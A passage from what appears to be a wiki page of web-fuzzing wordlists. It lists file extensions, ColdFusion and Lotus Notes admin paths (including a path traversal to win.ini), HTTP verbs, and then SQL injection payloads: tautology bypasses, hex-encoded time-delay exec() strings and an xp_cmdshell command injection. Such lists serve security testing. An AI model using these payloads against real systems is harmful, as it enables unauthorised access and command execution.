.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
